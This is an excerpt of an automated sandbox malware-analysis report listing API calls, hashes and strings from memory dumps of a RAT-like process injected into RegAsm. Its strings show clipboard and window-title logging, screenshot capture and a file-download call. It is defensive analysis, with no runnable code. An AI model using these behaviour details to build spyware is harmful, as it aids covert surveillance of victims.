                                                                                                                            • Opcode ID: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                                                                                            • Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
                                                                                                                            • Opcode Fuzzy Hash: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                                                                                            • Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A
                                                                                                                            APIs
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandleReadSize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3642004256-0
                                                                                                                            • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                            • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                            • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                            • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                                                                                                                              • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                                                                                              • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C594
                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                                                            • String ID: [ $ ]
                                                                                                                            • API String ID: 3309952895-93608704
                                                                                                                            • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                                                                                                            • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                                                                            • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                                                                                                                            • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 188215759-0
                                                                                                                            • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                                                                            • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                                                                                            • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                                                                            • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                                                                            • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                                                                                            • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                                                                            • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                                                                            • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                                                                                            • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                                                                            • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041C233
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleOpenProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 39102293-0
                                                                                                                            • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                                                                            • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                                                                                            • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                                                                                            • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                                                                              • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                                                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2633735394-0
                                                                                                                            • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                            • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                                                                            • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                            • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                                                                            APIs
                                                                                                                            • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194A3,00000000,00000000), ref: 004193F0
                                                                                                                            • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194A3,00000000,00000000), ref: 004193F6
                                                                                                                            • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194A3,00000000,00000000), ref: 004193FC
                                                                                                                            • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194A3,00000000,00000000), ref: 00419402
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4116985748-0
                                                                                                                            • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                            • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                                                                            • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                            • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                                                                            APIs
                                                                                                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                                                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                                                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                                                                              • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                                                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1761009282-0
                                                                                                                            • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                            • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                                                                                            • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                            • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                                                                                            APIs
                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                            • String ID: pow
                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                            • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                                                                            • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                                                                                            • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                                                                            • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 1000655C
                                                                                                                              • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                              • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                              • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                            • String ID: *?$.
                                                                                                                            • API String ID: 2667617558-3972193922
                                                                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                            • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                            • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                            APIs
                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418ABE
                                                                                                                              • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                                                                                              • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                                                                              • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                            • String ID: image/jpeg
                                                                                                                            • API String ID: 1291196975-3785015651
                                                                                                                            • Opcode ID: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                                                                                            • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                                                                                                            • Opcode Fuzzy Hash: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                                                                                            • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Init_thread_footer__onexit
                                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                            • API String ID: 1881088180-3686566968
                                                                                                                            • Opcode ID: ffe341345e4ad79b13a10f05b3645c8817a9f3cffb2ac3402b5cfd045c3f78ac
                                                                                                                            • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                                                                            • Opcode Fuzzy Hash: ffe341345e4ad79b13a10f05b3645c8817a9f3cffb2ac3402b5cfd045c3f78ac
                                                                                                                            • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                                                                            APIs
                                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ACP$OCP
                                                                                                                            • API String ID: 0-711371036
                                                                                                                            • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                                                                            • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                                                                                            • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                                                                            • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                                                                                            APIs
                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BAA
                                                                                                                              • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BCF
                                                                                                                              • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                                                                              • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                            • String ID: image/png
                                                                                                                            • API String ID: 1291196975-2966254431
                                                                                                                            • Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                                                                                            • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                                                                                            • Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                                                                                            • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                                                                                            APIs
                                                                                                                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                            Strings
                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LocalTime
                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                            • API String ID: 481472006-1507639952
                                                                                                                            • Opcode ID: be459fb98b3af4662d2c236266ded539e311002508a0c7527587bdc0a8c9f171
                                                                                                                            • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                                                                                            • Opcode Fuzzy Hash: be459fb98b3af4662d2c236266ded539e311002508a0c7527587bdc0a8c9f171
                                                                                                                            • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32 ref: 00416640
                                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DownloadFileSleep
                                                                                                                            • String ID: !D@
                                                                                                                            • API String ID: 1931167962-604454484
                                                                                                                            • Opcode ID: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
                                                                                                                            • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                                                                            • Opcode Fuzzy Hash: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
                                                                                                                            • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strlen
                                                                                                                            • String ID: : $Se.
                                                                                                                            • API String ID: 4218353326-4089948878
                                                                                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                            • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                            • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                            APIs
                                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LocalTime
                                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                            • API String ID: 481472006-2430845779
                                                                                                                            • Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                                                                                            • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                                                                            • Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                                                                                            • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                                                                            APIs
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
